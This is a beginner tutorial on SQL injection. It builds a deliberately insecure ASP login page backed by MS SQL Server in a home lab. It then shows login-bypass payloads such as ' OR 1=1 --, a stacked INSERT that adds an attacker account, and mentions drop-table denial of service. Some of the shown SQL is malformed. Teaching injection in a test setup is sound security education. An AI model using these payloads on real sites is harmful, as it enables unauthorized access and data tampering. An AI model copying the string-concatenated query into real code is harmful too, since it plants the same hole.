SQL Hacking → SQL Injection for dummies…
Introduction
The purpose of this article is to help people without advanced computer knowledge to start white hacking and learn how to write more secure login web pages. When I started to learn about security, even though I searched really hard, I did not manage to find articles that would tell me from scratch what to do in order to learn how SQL query injection works.
In fact for some strange reason almost none will actually explain you exactly what an SQL query injection is and how is that you can exploit a database using an SQL query injection.So based on these thoughts I decided to write this article, explaining in great detail how to create your own testing environment and perform SQL query injections (using your own machine, well not exactly).
The prerequisites for successfully repeating the experiment are:
1. VMWare Workstation 6.x (you do not have to use a vm machine but I recommend it).
2. Knowledge of ASP (create DSN-less Database Connection and handling html form data).
3. ASP Studio 2005 (you can download that at http://en.ewebxp.com/).
4. IIS 5.1 (Internet Information Services).
5. MSDE 2000 Release A (Microsoft SQL Server Desktop Engine 2000).
6. MDAC 2.x (Microsoft Data Access Components).
7. Know how to write html (mostly forms).
8. Internet browser (both Internet Explorer or Firefox will do).
IIS Installation & Configuration
In order to install IIS5.1 you need the WindowsXP CD and go:
Start->Control Panel->Add or Remove Programs->Add/Remove Windows Components->IIS5.1
For configuring IIS5.1 you have to create you own testing Web Site you go:
Start->Control Panel->Administrative Tools->IIS->Default Site(right click)->New->Virtual Directory
And then you go for Alias, give a name that represents your needs, and then define a Directory that your ASP page is located.Then you go and right click on the icon of your testing web site and go for properties and set them just like you see in the image below (this is not a secure IIS configuration).
Configuration1: Configuring Virtual Directory properties.
Configuration2: Configuring Directory Security.
MS SQL Server Installation & Configuration
Download from Internet the setup executable file, install data base, start running and then
go:
Start ->Run ->cmd (this will start command prompt)
And then type osql -U sa (for system administrator), give password (the default is blank!).
And then type again from command prompt:
1> CREATE TABLE users (userName varchar (10) , password varchar (10))
2> go
1> INSERT INTO users(userName,password) VALUES (value1,value2)
2> go
This will create a table to the database named master, you make sure of it if you do a:
1>use master
2> go
Now! you have a database named master and a table called user with two columns named userName and password.If you want to know more about SQL queries you can use www.sqlzoo.net to run your queries.
Building up the system
The system we are going to use is described below by the image.
Example1: Testing environment used to perform the experiment.
Now when you are actually trying to perform an SQL injection, what you do is trying to manipulate the SQL query in order to either gain access to a web site or download a database. We have two sub attacks generally speaking, the login page attack and the database download attack (or drop attack). In the first attack we want to create a query that bypasses the authentication mechanism forcing the database to return a positive reply (I will explain later what that positive reply is!! ).In the second attack we use the first query to build a second more sophisticated query to create a drop query (if we want to cause a Dos attack) or download the database (and make use of the data).
Why does a database return errors? Well it is simple, because your SQL query is forwarded from your Web application directly into your database (at least most of the time) through your html login web form.What I mean is described with the image below.
Example2: What is actually forwarded to the database.
If the user input that goes directly into the database is malicious, then the database is going to reply back with an error page returning valuable information on about what went wrong with the SQL query (e.g. data type mismatch e.t.c)
How to write insecure login pages
Since we explained what is forwarded directly from my Internet browser to my database we can start talking about how an insecure login page can be written.The html form used to write the exploitable code looks like something like that.
Code examples1: Html form code.
The ASP (Active Server Page) code is placed right above the html form , and because the ASP code page is executed from top to bottom, the ASP code will always execute first and then the html code will execute right afterwards. Now every time my browser submits data the login page is executed.The code displayed below is actually implementing a poor authentication mechanism. My code takes a user input from the html form (meaning userName and password), and feeds them right into the SQL query.
Code examples2: Authentication code.
First I define the values that I am going to hold the username and the password.Then I define the very famous database connection string.
sql ="SELECT userName,passwords FROM users WHERE userName='" _
"myuserName"'"" AND passwords='"mypassword"'"
Code examples3: Creating the SQL query string.
The code above issues a Recordset Object. An ADO (ADO stands for ActiveX Data Objects).A Recordset object is used to hold a set of records from a database table. A Recordset object consist of records and columns (fields).In ADO, this object is the most important and the one used most often to manipulate data from a database [1].
Set rs=Server.CreateObject("ADODB.recordset")
Code examples4: Creating an ADO object.
When you first open a Recordset, the current record pointer will point to the first record and EOF property is set to False. If there are no records, EOF property is True. The EOF property returns True (-1) if the current record position is after the last recording the Recordset, otherwise it returns False (0) [1].
In the if statement we check the Recordset to see if it is empty. If the Record set is empty then the EOF property will return True, so I reverse the true value putting in front a not operator! Now if the EOF property is empty it will be reversed and return a False value, and the server is going to print back the word Wrong (meaning that the database didn’t return a positive reply), otherwise it would print back the word Correct (meaning that the database did return a positive reply). By saying that the database returns a positive value I mean a non empty Recordset!!! The mistake here is that I let practically the database to validate my web user, without using a proper authentication mechanism.
The SQL injection attack
The only thing left to do is to exploit the code I wrote above, by finding a way to login without knowing the user name or the password. Because I wrote the code I know that my web page is vulnerable to SQL query injection and I also know what database engine is used and I also know the name of table containing the user names and passwords.
The SQL query forwarded to the database is:
SELECT userName,passwords FROM users WHERE userName='User Input' AND passwords='User Input'
Because I know that the database engine I am using is an MS SQL Server Desktop Engine 2000 I know that the commenting is made with a double minus, like –. So I want an SQL query that is going to return me an ADO Recordset object with its EOF property set to False (meaning an none empty ADO Recordset) without knowing any user name or password!
Step1:The malicious SQL query forwarded to the database is:
SELECT userName,passwords
FROM users
WHERE userName='User Input' OR 1=1 --
AND passwords='User Input'
Step2:Which translates into:
SELECT userName,passwords
FROM users
WHERE userName='' OR 1=1
Step3:Which is equivalent to :
SELECT userName,passwords
FROM users
WHERE userName='' OR 1=1
Code examples5: How SQL queries are translated by the database engine.
By commenting out the part of the SQL query that contains the AND section and adding an OR SQL operator we achieved to create an SQL query that is going to return an none empty ADO Recordset. Because the statement 1=1 is always going to be true, even with an empty user name. The single quote characters are used to tell to the SQL interpreter that the data type entered by the users is a varchar(10). The single quote character is meaningful only to the SQL engine. If the database is searching each table from top to bottom then the malicious attacker is going to log you as the first user it going to find out. Meaning the session id is going to belong to first user written into the database!!!!
Exploiting the SQL injection
I am clarifying that in order to perform a successful login you have to find the proper SQL query pattern. In the above example I found the web application is vulnerable to ‘ OR1=1 –, or even better is vulnerable to:
‘ OR mathematical expressions that is always true –
Code examples6: How SQL queries are translated by the database engine.
Based on the above assumption we can assume that more than one SQL query can be found having the same effect, as the one we used such as:
SELECT userName,passwords
FROM users
WHERE userName='' OR 'a'='a' --
SELECT userName,passwords
FROM users
WHERE userName='' OR 2=2 --
SELECT userName,passwords
FROM users
WHERE userName='' OR 0=0 --
Code examples7: Equivalent SQL queries.
Knowing that, we can understand that all queries listed above are going to allow as to login.But besides the fact that we are going to have a successful login what else is that we can to? Well the possibilities are limitless, because only are imagination can restrict us.Important notice this attack wont work on MS Access because , it does not support double dash comments, instead you can use the NULL type to comment out the query usingthe specialcharacters %00 [2].
Now since we have found an SQL query that my Web application is vulnerable we can make alterations and start trying to compromise the database integrity by inserting one more user name and password. How? Simply type into user name login html text box both queries sequentially!!!!!!!!!!!!!!!!
The SQL query pattern we are going to use is:
Use SQL pattern (insert as one line without enter):
' OR 1=1 INSERT INTO users userName VALUES ('hackedyou','hackpass') --
Which is forwarded from the web application to the database as:
SELECT userName,passwords
FROM users
WHERE userName=OR 1=1
INSERT INTO users userName passwords VALUES ('hackedyou','hackpass')
Code examples8: Exploiting the login page.
Reference [1]: http://www.w3schools.com/ado/ado_ref_recordset.asp
Reference:http[2]:www.webapptest.org/ms-access-sql-injection-cheat-sheet-EN.html